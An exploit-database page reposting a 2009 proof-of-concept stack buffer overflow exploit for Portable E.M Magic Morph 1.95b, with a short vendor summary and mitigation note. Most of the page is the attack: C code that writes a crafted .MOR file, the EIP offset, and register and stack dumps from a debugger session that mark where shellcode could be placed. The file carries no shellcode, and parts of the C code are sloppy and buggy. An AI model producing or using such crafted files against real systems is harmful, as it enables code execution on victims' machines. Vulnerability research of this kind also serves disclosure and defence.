header-logo
Suggest Exploit
vendor:
Magic Morph
by:
fl0 fl0w
7.5
CVSS
HIGH
Stack Buffer Overflow
Not provided
CWE
Product Name: Magic Morph
Affected Version From: 1.95b
Affected Version To: 1.95b
Patch Exists: NO
Related CWE: Not provided
CPE: Not provided
Metasploit:
Other Scripts:
Platforms Tested: Not provided
Not provided

Portable E.M Magic Morph 1.95b .MOR File Stack Buffer Overflow POC

This is a proof of concept for a stack buffer overflow vulnerability in Portable E.M Magic Morph 1.95b. By creating a specially crafted .MOR file and editing it with a hex editor, an attacker can trigger a stack buffer overflow. The EIP offset is at 312 bytes (0x138 HEX). The exploit uses a technique called 'stack spray' to determine the offset. The CPU registers at the time of the exploit are: EAX=00000000, ECX=33333333, EDX=01492288, EBX=00000001, ESP=0012EF7C. The exploit payload is a string of characters and symbols.

Mitigation:

The vendor should release a patch to fix the stack buffer overflow vulnerability. In the meantime, users should avoid opening or processing untrusted .MOR files.
Source

Exploit-DB raw data:

   /*********************************************************************
    Portable E.M Magic Morph 1.95b .MOR File Stack Buffer Overflow POC  *
    By fl0 fl0w                                                         *
    "can't stop me/my time is now/your time is up/MY TIME IS NOW !!!!"  *                               
   **********************************************************************             
   

  /********************************************************************************************************
   The EIP offset is at 312 bytes 0x138 HEX                                                               *  
   After you compile and create the .MOR file ,edit it with HEX EDITOR and start counting from the start  *   
   of the file, and you'll have to rezult with 0x138 bytes                                                *
                                                                                                          *
   I used a technique names "stack spray" to determine the offset.                                        *
                                                                                                          * 
   CPU REGISTERS                                                                                          *  
   EAX 00000000                                                                                           *
   ECX 33333333                                                                                           *
   EDX 01492288                                                                                           *
   EBX 00000001                                                                                           *
                                                                                                          *
   ESP 0012EF7C ASCII "444bbbbbbbbbbbgggggggggggggggggbaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa   *
   ````````````````````````````````````````````````YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY       *
   XXXXXXXXXXXXXXXXcccccccccccccccccccccccccccccccc2222222223                                             *
   EBP 0012F3CC ASCII "````````````````````````````````````````````````YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY   *
   YYYYYYYYYYYYYYYYXXXXXXXXXXXXXXXXcccccccccccccccccccccccccccccccc2222222223333333333fffffAAAAww44444b   *
   bbbbbbbbbbgggggggggggggggggbaaaaaaaaaaaaaaaaaaaaaaaaaa                                                 *
                                                                                                          * 
   ESI 00F369B0                                                                                           *
   EDI 00F369B0                                                                                           *
   EIP 41414141                                                                                           *
                                                                                                          * 
   We control ECX, EIP witch is more than enought to copy what addresess you want in the memory.          *
   So I go in OLLYDBG at the ESP register and right click ->follow in stack ,I observe that the corruption*
   starts at a much lower address.                                                                        *
   This is what ESP points to:                                                                            *
   ******************************************************************************************************** 
  */ 
   
   /************************
     STACK                 * 
     0012EF7C   62343434   *                                                                               
     0012EF80   62626262   *
     0012EF84   62626262   *
     0012EF88   67676262   *
     0012EF8C   67676767   *
     0012EF90   67676767   *
     0012EF94   67676767   *
     0012EF98   62676767   *
     0012EF9C   61616161   *
     0012EFA0   61616161   *
     0012EFA4   61616161   *
     0012EFA8   61616161   *
     0012EFAC   61616161   *
     0012EFB0   61616161   * 
     0012EFB4   61616161   * 
     0012EFB8   61616161   *
     0012EFBC   61616161   *
     0012EFC0   61616161   *
     0012EFC4   61616161   *
     0012EFC8   61616161   *
     0012EFCC   60606060   *
     0012EFD0   60606060   *
     0012EFD4   60606060   *
     0012EFD8   60606060   *
     0012EFDC   60606060   *
     0012EFE0   60606060   *
     0012EFE4   60606060   *
     0012EFE8   60606060   *  
     0012EFF0   60606060   *
     0012EFF4   60606060   *
     0012EFF8   60606060   *
     0012EFFC   59595959   *
     0012F000   59595959   *
     0012F004   59595959   *
     0012F008   59595959   *
     0012F00C   59595959   *
     ..................... *
     ***********************
*/


/*************************************************
You can copy your shellcode starting from here : *
    0012EC3C   63636363                          *
                                                 * 
 0x12EF80 = 1240960 ->NOT-> A                    * 
                                                 * 
 0x12EC3C = 1240124 ->NOT-> B                    * 
                                                 *
 A > B                                           * 
 A - B = 836 = 0x344                             *  
 So the stack gets corrupted a long way from ESP.*
 *************************************************
 */
 
 

  /************************************************* 
   LOOK OF THE DUMP                                * 
   0012EE4C              63 63 63 63      cccc     *
   0012EE54  63 63 63 63 63 63 63 63  cccccccc     *
   0012EE5C  32 32 32 32 32 32 32 32  22222222     *
   0012EE64  32 33 33 33 33 33 33 33  23333333     *
   0012EE6C  33 33 33 66 66 66 66 66  333fffff     *
   0012EE74  41 41 41 41 77 77 34 34  AAAAww44     *
   0012EE7C  34 34 34 62 62 62 62 62  444bbbbb     *
   0012EE84  62 62 62 62 62 62 67 67  bbbbbbgg     *
   0012EE8C  67 67 67 67 67 67 67 67  gggggggg     *
   0012EE94  67 67 67 67 67 67 67 62  gggggggb     *
   0012EE9C  61 61 61 61 61 61 61 61  aaaaaaaa     *
   0012EEA4  61 61 61 61 61 61 61 61  aaaaaaaa     *
   0012EEAC  61 61 61 61 61 61 61 61  aaaaaaaa     *
   0012EEB4  61 61 61 61 61 61 61 61  aaaaaaaa     *
   0012EEBC  61 61 61 61 61 61 61 61  aaaaaaaa     *
   0012EEC4  61 61 61 61 61 61 61 61  aaaaaaaa     *
   0012EECC  60 60 60 60 60 60 60 60  ````````     *
   0012EED4  60 60 60 60 60 60 60 60  ````````     *
   0012EEDC  60 60 60 60 60 60 60 60  ````````     *
   0012EEE4  60 60 60 60 60 60 60 60  ````````     *
   0012EEEC  60 60 60 60 60 60 60 60  ````````     *
   0012EEF4  60 60 60 60 60 60 60 60  ````````     *
   0012EEFC  59 59 59 59 59 59 59 59  YYYYYYYY     *
   0012EF04  59 59 59 59 59 59 59 59  YYYYYYYY     *
   0012EF0C  59 59 59 59 59 59 59 59  YYYYYYYY     *
   0012EF14  59 59 59 59 59 59 59 59  YYYYYYYY     *
   0012EF1C  59 59 59 59 59 59 59 59  YYYYYYYY     *
   0012EF24  59 59 59 59 59 59 59 59  YYYYYYYY     *
   0012EF2C  58 58 58 58 58 58 58 58  XXXXXXXX     *
   0012EF34  58 58 58 58 58 58 58 58  XXXXXXXX     *
   0012EF3C  63 63 63 63 63 63 63 63  cccccccc     *
   0012EF44  63 63 63 63 63 63 63 63  cccccccc     *
   0012EF4C  63 63 63 63 63 63 63 63  cccccccc     *
   0012EF54  63 63 63 63 63 63 63 63  cccccccc     *
   0012EF5C  32 32 32 32 32 32 32 32  22222222     *
   0012EF64  32 33 33 33 33 33 33 33  23333333     *
   0012EF6C  33 33 33 66 66 66 66 66  333fffff     *
   0012EF74  41 41 41 41 77 77 34 34  AAAAww44     *
   0012EF7C  34 34 34 62 62 62 62 62  444bbbbb     *
   0012EF84  62 62 62 62 62 62 67 67  bbbbbbgg     *
   0012EF8C  67 67 67 67 67 67 67 67  gggggggg     *
   0012EF94  67 67 67 67 67 67 67 62  gggggggb     *
   0012EF9C  61 61 61 61 61 61 61 61  aaaaaaaa     *
   0012EFA4  61 61 61 61 61 61 61 61  aaaaaaaa     *
   0012EFAC  61 61 61 61 61 61 61 61  aaaaaaaa     *
   0012EFB4  61 61 61 61 61 61 61 61  aaaaaaaa     *
   0012EFBC  61 61 61 61 61 61 61 61  aaaaaaaa     *
   0012EFC4  61 61 61 61 61 61 61 61  aaaaaaaa     *
   0012EFCC  60 60 60 60 60 60 60 60  ````````     *
   0012EFD4  60 60 60 60 60 60 60 60  ````````     *
   0012EFDC  60 60 60 60 60 60 60 60  ````````     *
   0012EFE4  60 60 60 60 60 60 60 60  ````````     *
   0012EFEC  60 60 60 60 60 60 60 60  ````````     *
   0012EFF4  60 60 60 60 60 60 60 60  ````````     *
   0012EFFC  59 59 59 59 59 59 59 59  YYYYYYYY     *
   0012F004  59 59 59 59 59 59 59 59  YYYYYYYY     *
   0012F00C  59 59 59 59 59 59 59 59  YYYYYYYY     *
  *************************************************
  */ 
  
  /**************************************************************************************
    Hello to all my buddies from insecurity.ro ,skullbox.info ,renslt.org               * 
    Special greetz to OSHO,!_30,str0ke,Carcabot.                                                 *  
    Vizite my website for more bugs ,papers, exploits, pocs and programming techniques. *
    http://www.sploitz.10001mb.com                                                      *
  *************************************************************************************
  */
  
  /*************************************************************************
  DEMO                                                                     *            
  C:\Documents and Settings\Stefan\Desktop\magic moth poc>mm.exe           *
  *********************************************************************    *
                Magic Morph .MOR File Stack Buffer Overflow POC            * 
  The usage is:                                                            *  
                All Credits fl0 fl0w                                       *   
                                                                           *    
        -f       FILE.mor                                                  *     
  ************************************************************************** 
                                                                           *      
  C:\Documents and Settings\Stefan\Desktop\magic moth poc>mm.exe -f TEST   *
  File DONE !                                                              *
  **************************************************************************
  */
  
  /*****************************************************************************************
  Technicall details                                                                       * 
  This program was compiled with DEV-Cpp and tested with success on MS Windows Xp Sp3      *
  You can download the POC allong with debugging details from my website                   *
  
  Preview ...                                                                              * 
  ......                                                                                   *  
  This folder contains two screenshots from the ollydbg debbugging session, the poc(MM.CPP)* 
  and the software Portable E.M Magic Morph 1.95b.                                                                        *   
  ALL CREDITS GO TO fl0 fl0w for this exploit !                                            *
  http://www.sploitz.10001mb.com/                                                          * 
   ...........................                                                             *  
  ******************************************************************************************   
  */
  //START Algorithm
 #include "stdio.h"
 #include "string.h"
 #include "stdlib.h"
 #include "windows.h"
 #include "stdint.h"
 #include "getopt.h"
 typedef struct flo {
 uint8_t a;
 uint8_t b;
 uint8_t c;
         }F;
         
  

 void buildFile(char *fname)
 { 
   uint8_t hexfileP1[] =
{
    0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74, 0x73, 0x20, 0x61, 0x6E, 0x64, 
    0x20, 0x53, 0x65, 0x74, 0x74, 0x69, 0x6E, 0x67, 0x73, 0x5C, 0x53, 0x74, 0x65, 0x66, 0x61, 0x6E, 
    0x5C, 0x4D, 0x79, 0x20, 0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74, 0x73, 0x5C, 0x4D, 0x73, 
    0x20, 0x73, 0x75, 0x70, 0x72, 0x65, 0x6D, 0x63, 0x79, 0x30, 0x30, 0x30, 0x2E, 0x6A, 0x70, 0x67, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 
    0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 
    0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 
    0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 
    0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 
    0x33, 0x33, 0x33, 0x66, 0x66, 0x66, 0x66, 0x66, 0x41, 0x41, 0x41, 0x41, 0x77, 0x77, 0x34, 0x34, 
    0x34, 0x34, 0x34, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x67, 0x67, 
    0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x62, 
   };
   
   uint8_t hexfileP2[] = {
    0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
    0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
    0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
    0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 
    0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 
    0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 
    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
    0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 
    0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 
    0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 
    0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 
    0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 
    0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 
    0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 
    };
    
    uint8_t hexfileP3[] = {
    0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 
    0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x43, 0x3A, 0x5C, 0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74, 0x73, 
    0x20, 0x61, 0x6E, 0x64, 0x20, 0x53, 0x65, 0x74, 0x74, 0x69, 0x6E, 0x67, 0x73, 0x5C, 0x53, 0x74, 
    0x65, 0x66, 0x61, 0x6E, 0x5C, 0x4D, 0x79, 0x20, 0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74, 
    0x73, 0x5C, 0x72, 0x6F, 0x6E, 0x61, 0x6C, 0x64, 0x6F, 0x2D, 0x62, 0x72, 0x61, 0x7A, 0x69, 0x6C, 
    0x2D, 0x77, 0x61, 0x6C, 0x6C, 0x70, 0x61, 0x70, 0x65, 0x72, 0x2E, 0x6A, 0x70, 0x67, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
} ;   
   FILE *f;
   f = fopen(fname ,"wb");
   F *Gf;
   Gf = (F*)malloc(sizeof(F));
   Gf->a = 0x43;
   Gf->b = 0x3A;
   Gf->c = 0x5C;
   uint8_t B[100];
   memcpy(B, Gf, sizeof(Gf));
   fwrite(B, sizeof(uint8_t), 3, f);
   fwrite(hexfileP1, sizeof(uint8_t), sizeof(hexfileP1), f);
   fwrite(hexfileP2, sizeof(uint8_t), sizeof(hexfileP2), f);
   fwrite(hexfileP3, sizeof(uint8_t), sizeof(hexfileP3), f);
   fclose(f);
      }
   void args(int argc, char *argv[])
    { 
    int file;
    int a;
    if(a) 
    while((a = getopt(argc, argv, "f")) != EOF) {
    switch(a)                                     {
    case 'f':
    file = (int)optarg;
    break;
    default:
    exit(-1);
                                                   }
  						                           }
                                                   }   
    void Usage (char *Name)
   { system("CLS");
         printf("*********************************************************************\n");
      fprintf ( stdout , "\t\tPortable E.M Magic Morph 1.95b .MOR File Stack Buffer Overflow POC\n");
     printf("The usage is:\n");
    
     fprintf ( stdout , "\t\tAll Credits fl0 fl0w\n");
         }   
     void Menu()
   { fprintf(stderr,
    "\n"
    "\t-f       FILE.mor\n"
    "*********************************************************************"
    "\n");
   }         
   
  int main(int32_t argc , char *argv[])
  {  if(argc < 2) {
      Usage(argv[0]);             
     Menu();             
    
     exit(-1);
                  }  
     char b[100];                  
     strcpy(b, argv[2]);
     strcat(b, ".mor");                 
     buildFile(b);
     printf("File DONE !\n");
     return 0;
      }      
 //END Algorithm

/ milw0rm.com [2009-09-14]